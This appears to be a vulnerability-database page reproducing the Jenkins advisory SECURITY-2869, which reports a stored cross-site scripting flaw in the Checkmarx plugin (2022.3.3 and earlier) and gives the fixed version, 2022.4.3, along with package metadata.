[JENKINS:SECURITY-2869] Stored XSS vulnerability in `checkmarx`
Severity
High
Affected Packages
2
Fixed Packages
2
CVEs
1
checkmarx
processes Checkmarx service API responses and generates HTML reports from them for rendering on the Jenkins UI.
checkmarx
2022.3.3 and earlier does not escape values returned from the Checkmarx service API before inserting them into HTML reports.
This results in a stored cross-site scripting (XSS) vulnerability.
NOTE: While Jenkins users without Overall/Administer permission are not allowed to configure the URL to the Checkmarx service, this could still be exploited via man-in-the-middle attacks.
checkmarx
2022.4.3 escapes values returned from the Checkmarx service API before inserting them into HTML reports.
Package | Affected Version |
---|---|
pkg:maven/org.jenkins-ci.plugins/checkmarx | <= 2022.3.3 |
pkg:github/jenkinsci/checkmarx-plugin | <= 2022.3.3 |
Package | Fixed Version |
---|---|
pkg:maven/org.jenkins-ci.plugins/checkmarx | = 2022.4.3 |
pkg:github/jenkinsci/checkmarx-plugin | = 2022.4.3 |
- ID
- JENKINS:SECURITY-2869
- Severity
- high
- Published
-
2022-12-07T00:00:00
(21 months ago) - Modified
-
2022-12-07T00:00:00
(21 months ago) - Rights
- Jenkins Security Team
- Other Advisories
Source | # ID | Name | URL |
---|---|---|---|
Plugin repository | checkmarx repository | https://github.com/jenkinsci/checkmarx-plugin |
Type | Package URL | Namespace | Name / Product | Version | Distribution / Platform | Arch | Patch / Fix |
---|---|---|---|---|---|---|---|
Affected | pkg:maven/org.jenkins-ci.plugins/checkmarx | org.jenkins-ci.plugins | checkmarx | <= 2022.3.3 | |||
Fixed | pkg:maven/org.jenkins-ci.plugins/checkmarx | org.jenkins-ci.plugins | checkmarx | = 2022.4.3 | |||
Affected | pkg:github/jenkinsci/checkmarx-plugin | jenkinsci | checkmarx-plugin | <= 2022.3.3 | |||
Fixed | pkg:github/jenkinsci/checkmarx-plugin | jenkinsci | checkmarx-plugin | = 2022.4.3 |
# CVE | Description | CVSS | EPSS | EPSS Trend (30 days) | Affected Products | Weaknesses | Security Advisories | Exploits | PoC | Pubblication Date | Modification Date |
---|---|---|---|---|---|---|---|---|---|---|---|
# CVE | Description | CVSS | EPSS | EPSS Trend (30 days) | Affected Products | Weaknesses | Security Advisories | PoC | Pubblication Date | Modification Date |